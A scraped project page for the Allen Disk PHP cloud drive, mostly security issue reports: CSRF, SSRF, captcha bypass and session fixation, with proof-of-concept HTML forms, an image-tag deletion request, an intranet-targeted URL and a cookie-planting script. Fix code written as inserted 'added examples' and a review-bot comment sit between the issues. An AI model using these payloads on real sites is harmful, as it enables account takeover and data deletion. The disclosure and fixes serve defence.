
allendisk's Introduction

Allen Disk

Allen Disk is a powerful, free and open-source cloud drive. With Allen Disk you can run your own online storage, and even open up registration so that anyone can use it as a free file host. Allen Disk comes with encrypted file storage, external file links, online preview, folder sharing and more, so you can easily manage your files or share them with everyone. http://ad.allenchou.cc

allendisk's People

Contributors

s3131212, koru1130


allendisk's Issues

CSRF Vulnerability in /admin/setting.php

/admin/setting.php

if ($_SESSION['alogin']) {
    if (isset($_GET['set']) && $_GET['set'] == 'set') {
        $db->update('setting', array('value' => $_POST['sitename']), array('name' => 'sitename'));
        $db->ExecuteSQL(sprintf("UPDATE `setting` SET `value` = '%s' WHERE `setting`.`name` = 'sitetitle';", $db->databaseLink->real_escape_string($_POST['sitetitle'])));
        $db->update('setting', array('value' => $_POST['size']), array('name' => 'size'));
        $db->update('setting', array('value' => $_POST['url']), array('name' => 'url'));
        $db->update('setting', array('value' => $_POST['total']), array('name' => 'total'));
        $db->update('setting', array('value' => $_POST['admin']), array('name' => 'admin'));
        $db->update('setting', array('value' => $_POST['subtitle']), array('name' => 'subtitle'));
...

There you see, no CSRF token, which could lead to system setting modification once the admin visits a malicious web page.

These two lines appear at the top of the download page~~

Warning: set_time_limit() has been disabled for security reasons in /home/snowdrive/public_html/downfile.php on line 10

Warning: Cannot modify header information - headers already sent by (output started at /home/snowdrive/public_html/downfile.php:10) in /home/snowdrive/public_html/downfile.php on line 31


CSRF Vulnerability in /admin/newb.php

/admin/newb.php

$username = $_POST['username'];
$email = $_POST['email'];
$password = $_POST['password'];

Obviously it does not implement a CSRF token, which makes it possible for a new user to be created once the admin visits the following web page:

<form action="http://allendiskdemo.com/admin/newb.php" method="POST">
<input type=text name=username value=newuser>
<input type=text name=password value=passw0rd>
<input type=text name=email [email protected]>
</form>
<script>document.forms[0].submit()</script>

SSRF Vulnerability in /remotedownload.php

/remotedownload.php

$file = @file_get_contents($_POST['file']);
$header = @get_headers($_POST['file'], 1);
if ($file !== false && stripos($header[0], '200') !== false) {

Obviously, $_POST['file'] could be within an intranet IP range, e.g. file=http%3A%2F%2F192.168.1.1%2Fvulnerable-router.php, thus exposing a great attack surface.
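An added example, not code from Allen Disk, of the check a defender would put in front of file_get_contents() here: the submitted URL is parsed, its host resolved, and any address in a private or reserved range is refused. safe_remote_url() is an assumed name.

```php
<?php
// Added example, not Allen Disk code: validate the URL handed to
// /remotedownload.php before file_get_contents() touches it. safe_remote_url()
// is an assumed name; the blocked ranges are PHP's own
// FILTER_FLAG_NO_PRIV_RANGE and FILTER_FLAG_NO_RES_RANGE sets.

function safe_remote_url(string $url): ?string {
    $parts = parse_url($url);
    // Only http/https with an explicit host: rejects file://, php://, gopher://, ...
    if ($parts === false || empty($parts['host'])
        || !in_array(strtolower($parts['scheme'] ?? ''), ['http', 'https'], true)) {
        return null;
    }
    // Embedded credentials (http://user@host) are a classic parser-confusion trick
    if (isset($parts['user']) || isset($parts['pass'])) {
        return null;
    }
    $host    = $parts['host'];
    $literal = trim($host, '[]');            // parse_url keeps IPv6 brackets
    if (filter_var($literal, FILTER_VALIDATE_IP) !== false) {
        $ips = [$literal];
    } else {
        // Resolve the name ourselves so the check sees the address the fetch
        // would hit (gethostbynamel() is IPv4-only)
        $ips = gethostbynamel($host) ?: [];
    }
    if ($ips === []) {
        return null;
    }
    foreach ($ips as $ip) {
        // Rejects 10/8, 172.16/12, 192.168/16, 127/8, 169.254/16, ::1, fc00::/7, ...
        if (filter_var($ip, FILTER_VALIDATE_IP,
                FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false) {
            return null;
        }
    }
    return $url;
}

// In place of  $file = @file_get_contents($_POST['file']);
$url = safe_remote_url($_POST['file'] ?? '');
if ($url === null) {
    http_response_code(400);
    exit('remote download: URL not allowed');
}
// Do not follow redirects: a public host could bounce the fetch to an internal one
$ctx  = stream_context_create(['http' => ['follow_location' => 0, 'timeout' => 10]]);
$file = file_get_contents($url, false, $ctx);
```

The name is resolved twice (once here, once by file_get_contents), so a DNS-rebinding host can still slip through; routing fetches through an egress proxy with no route to internal networks closes that gap.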

Captcha Bypass Vulnerability in /reg.php

/reg.php

if (isset($_POST[ 'name']) && isset($_POST[ 'password2']) && isset($_POST[ 'password']) && $config[ 'reg'] == 'true') {
    $username = $_POST[ 'name'];
    $email = $_POST[ 'email'];
    $password = $_POST[ 'password'];
    $password2 = $_POST[ 'password2'];
    $namecheck = $db->ExecuteSQL(sprintf("SELECT count(*) AS `count` FROM `user` WHERE `name` = '%s'", $db->SecureData($username)));
    if ($namecheck[0]['count'] > 0) {
        $err = 2;
    } elseif ($username == '') {
        $err = 0;
    } elseif ($email == '') {
        $err = 0;
    } elseif ($password == '') {
        $err = 0;
    } elseif ($password != $password2) {
        $err = 1;
    } elseif (strtolower($_POST['captcha']) != strtolower($_SESSION['captcha']['code'])) {
        $err = 4;
    } else {
        $db->insert(array('name' => $username, 'pass' => password_hash($password, PASSWORD_DEFAULT), 'email' => $email), 'user');
        $err = 3;
    }
}

As with the Captcha Bypass Vulnerability in /admin/loginc.php, the following code does not check whether isset($_SESSION['captcha']['code'])==1,

} elseif (strtolower($_POST['captcha']) != strtolower($_SESSION['captcha']['code'])) {

So, in order to bypass this captcha, we could simply empty $_POST['captcha'], but make sure there is no previous GET request to /reg.php.

Session Fixation Vulnerability in /admin/loginc.php

/admin/loginc.php

include '../config.php';
if (!session_id()) {
    session_start();
}
$res = $db->select('setting', array('name' => 'admin'));
if ($_POST['password'] == $res[0]['value'] && strtolower($_POST['captcha']) == strtolower($_SESSION['captcha']['code'])) {
    $_SESSION['alogin'] = true;
    header('Location: index.php');
} else {
    header('Location: login.php?err=1');
}

As with the Session Fixation Vulnerability in /loginc.php, the system does not regenerate a new session_id after the admin has successfully logged in, which could lead to admin account takeover with the help of any XSS vulnerability in the same domain.

CSRF Vulnerability in /admin/manuser.php

/admin/manuser.php

if (isset($_GET['delete'])) {
    $file_list = $db->select('file', array('owner' => $_GET['delete']));
    if (is_array($file_list)) {
        foreach ($file_list as $d) {
            @unlink(dirname(dirname(__FILE__)).'/file/'.$d['realname'].'.data');
            $db->delete('file', array('id' => $d['id']));
        }
    }
    $dir_list = $db->select('dir', array('owner' => $_GET['delete']));
    if (is_array($dir_list)) {
        foreach ($db->select('dir', array('owner' => $_GET['delete'])) as $d) {
            $db->delete('dir', array('id' => $d['id']));
        }
    }
    $db->delete('user', array('name' => $_GET['delete']));
    $alert = "<div class='alert alert-success'>刪除成功</div>";
}

Without a CSRF token, any existing user and his data could be deleted once the admin visits the following page:

<img src="http://localhost/admin/manuser.php?delete=victim" />
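One way to close all three CSRF issues on this page (/admin/setting.php, /admin/newb.php and this /admin/manuser.php delete action), as an added example that is not Allen Disk's own code: a per-session token checked before every state change. csrf_token(), csrf_check(), csrf_abort() and the session key 'csrf' are assumed names.

```php
<?php
// Added example, not Allen Disk code: one per-session CSRF token for the admin
// pages in the three CSRF issues. Function names and the 'csrf' key are assumed.
session_start();

function csrf_token(): string {
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(32)); // bound to this session
    }
    return $_SESSION['csrf'];
}

function csrf_check(?string $token): bool {
    // A missing token never matches; hash_equals avoids a timing side channel
    return isset($_SESSION['csrf'], $token) && hash_equals($_SESSION['csrf'], $token);
}

function csrf_abort(): void {
    http_response_code(403);
    exit('invalid CSRF token');
}

// /admin/setting.php and /admin/newb.php: verify before any database write
if (($_SERVER['REQUEST_METHOD'] ?? 'GET') === 'POST') {
    if (!csrf_check($_POST['csrf'] ?? null)) {
        csrf_abort();
    }
    // ... $db->update(...) / $db->insert(...) exactly as before
}

// /admin/manuser.php: the delete action is a GET request, so the token rides in
// the query string; <img src="manuser.php?delete=victim"> cannot supply it
if (isset($_GET['delete'])) {
    if (!csrf_check($_GET['csrf'] ?? null)) {
        csrf_abort();
    }
    // ... remove the user's files, dirs and row exactly as before
}

$name = 'victim'; // constructed value for the link below
?>
<!-- every state-changing form carries the token as a hidden field -->
<form method="POST" action="newb.php">
    <input type="hidden" name="csrf" value="<?= htmlspecialchars(csrf_token()) ?>">
    <input type="text" name="username">
    <input type="submit" value="create">
</form>
<!-- and every state-changing link carries it as a query parameter -->
<a href="manuser.php?delete=<?= urlencode($name) ?>&amp;csrf=<?= htmlspecialchars(csrf_token()) ?>">delete</a>
```

Moving the delete action to a POST form would be better still; a SameSite cookie attribute helps but is not a substitute for the token.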

Captcha Bypass Vulnerability in /admin/loginc.php

/admin/loginc.php

include '../config.php';
if (!session_id()) {
    session_start();
}
$res = $db->select('setting', array('name' => 'admin'));
if ($_POST['password'] == $res[0]['value'] && strtolower($_POST['captcha']) == strtolower($_SESSION['captcha']['code'])) {
    $_SESSION['alogin'] = true;
    header('Location: index.php');
} else {
    header('Location: login.php?err=1');
}

Note that $_SESSION['captcha']['code'] is set in /captcha/simple-php-captcha.php.
To bypass the captcha verification, we simply need to empty the $_POST['captcha'], but be sure there is no previous request to /captcha/simple-php-captcha.php.

How to fix:

- if ($_POST['password'] == $res[0]['value'] && strtolower($_POST['captcha']) == strtolower($_SESSION['captcha']['code'])) {
+ if ($_POST['password'] == $res[0]['value'] && isset($_SESSION['captcha']['code']) && strtolower($_POST['captcha']) == strtolower($_SESSION['captcha']['code'])) {
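Review bot: the isset($_SESSION['captcha']['code']) guard closes the empty-captcha bypass, but the code stays in the session after the comparison, so one solved captcha can be replayed on every further login attempt; unset($_SESSION['captcha']) right after comparing it, whether or not the login succeeds. The same condition still reads $_POST['captcha'] and $_POST['password'] without isset(), which raises notices on a request missing either field, and compares the admin password with a loose == rather than hash_equals().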
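An added example, not Allen Disk code, of a captcha check that fails closed when no code has been issued and that consumes the code after one comparison; it applies equally to the /reg.php check reported above. verify_captcha() and admin_login() are assumed names, and the walk-through at the bottom uses constructed values.

```php
<?php
// Added example, not Allen Disk code: a single-use captcha check for the
// comparisons in /reg.php and /admin/loginc.php. verify_captcha() and
// admin_login() are assumed names; $_SESSION['captcha']['code'] is the layout
// the issue attributes to /captcha/simple-php-captcha.php.

function verify_captcha(?string $answer): bool {
    // No code in the session (no captcha was ever issued) fails closed. This is
    // the case the original != comparison got wrong: both sides were empty.
    if (!isset($_SESSION['captcha']['code']) || $answer === null || $answer === '') {
        return false;
    }
    $expected = strtolower((string) $_SESSION['captcha']['code']);
    // Consume the code whatever the outcome, so one solved captcha cannot be
    // replayed across many registration or login attempts
    unset($_SESSION['captcha']);
    return hash_equals($expected, strtolower($answer));
}

// /admin/loginc.php logic with the helper; $stored is $res[0]['value'] in the
// original and is still compared as-is, only in constant time.
function admin_login(string $stored, ?string $password, ?string $captcha): bool {
    // Captcha first, so a wrong captcha never leaks whether the password was right
    if (!verify_captcha($captcha)) {
        return false;
    }
    return $password !== null && hash_equals($stored, $password);
}

// Constructed walk-through from the CLI, where $_SESSION is just an array:
$_SESSION = [];
$bypass = verify_captcha('');               // no code issued: must fail closed
$_SESSION['captcha'] = ['code' => 'AbC3'];
$first  = verify_captcha('abc3');           // case-insensitive match, code consumed
$replay = verify_captcha('abc3');           // code already consumed: must be rejected
var_dump($bypass, $first, $replay);
```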

Decryption fails when downloading large files

With larger files, the file can be uploaded but cannot be decrypted correctly. The file size is below the memory limit, yet PHP only returns an empty 0 B file.

Session Fixation Vulnerability in /loginc.php

/loginc.php

if (!session_id()) {
    session_start();
}
...
...
$username = $_POST['name'];
$password = $_POST['password'];
$res = login($username, $password);
switch ($res) {
    case 0:
        echo 1;
    break;

    case 1:
        $_SESSION['login'] = true;
        $_SESSION['username'] = htmlspecialchars($username);
        $_SESSION['password'] = md5_128($password);
        echo 2;
    break;

    default:
        echo 0;
    break;
}

We can see that even after we have successfully logged in, the system does not regenerate a new session_id.
Note that this Session Fixation Vulnerability could easily be exploited with the help of any XSS Vulnerability in the same domain, e.g. the XSS Vulnerability in /readfile.php, as there is no HttpOnly flag.

<script>
document.cookie="session_name=session";
document.cookie="session=HACKED";
</script>

Once the victim has logged in with the session cookie above, the attacker could take full control of the victim's account using the same cookie.

Session Bug - logged in without an account

On the same server,
log in to LTAYER first, then open AllenDisk.
AllenDisk skips the pre-login home page and goes straight to the file management page.
I suspect the session name is duplicated.
Still thinking about a solution.
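An added example, not Allen Disk code, of session handling that addresses both fixation issues on this page (/loginc.php and /admin/loginc.php) and the session-name collision reported just above. start_session(), login_success(), logout() and the cookie name ALLENDISK_SESSID are assumptions; the 'login', 'username', 'password' and 'alogin' keys are the ones the page shows.

```php
<?php
// Added example, not Allen Disk code: session handling for /loginc.php and
// /admin/loginc.php (session fixation) and for the session-name collision
// reported in the Session Bug issue. Function names and the cookie name are
// assumptions; the session keys are the page's own.

function start_session(): void {
    if (session_status() === PHP_SESSION_ACTIVE) {
        return;
    }
    // A cookie name of our own: sharing the default PHPSESSID with another
    // app on the same host is what lets its session satisfy this app's checks
    session_name('ALLENDISK_SESSID');
    // Never adopt a session id the client made up (the fixation precondition)
    ini_set('session.use_strict_mode', '1');
    ini_set('session.use_only_cookies', '1');
    $https = !empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off';
    session_set_cookie_params([
        'path'     => '/',
        'secure'   => $https,
        'httponly' => true,   // document.cookie cannot read it from an XSS
        'samesite' => 'Lax',
    ]);
    session_start();
}

function login_success(array $attrs): void {
    // Privilege change, so issue a fresh id; true discards the old session data,
    // leaving a pre-planted id worthless even if the server had accepted it
    session_regenerate_id(true);
    foreach ($attrs as $key => $value) {
        $_SESSION[$key] = $value;
    }
}

function logout(): void {
    $_SESSION = [];
    session_destroy();
}

// /loginc.php, in `case 1:` of the switch shown above, instead of the bare assignments:
//     login_success(['login' => true, 'username' => htmlspecialchars($username),
//                    'password' => md5_128($password)]);
// /admin/loginc.php, on a correct password and captcha:
//     login_success(['alogin' => true]);
start_session();
```

Strict mode plus regeneration is what defeats a planted id; HttpOnly only stops a script from reading the cookie, not from setting one when none exists yet.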

MySQL Bug

When I use MySQL Community Server, AllenDisk has a bug.
When I upload a file and the upload script reports a successful upload, the file does not appear on the web page, but the file is encrypted and stored successfully.
Also, in phpMyAdmin I cannot see any records in the database.
But when I use the MySQL bundled with XAMPP, the above error does not occur.

System environment:
OS : Windows Server 2012 R2
Web Server : IIS 7
MySQL DataBase : MySQL Community Server 5.6.27
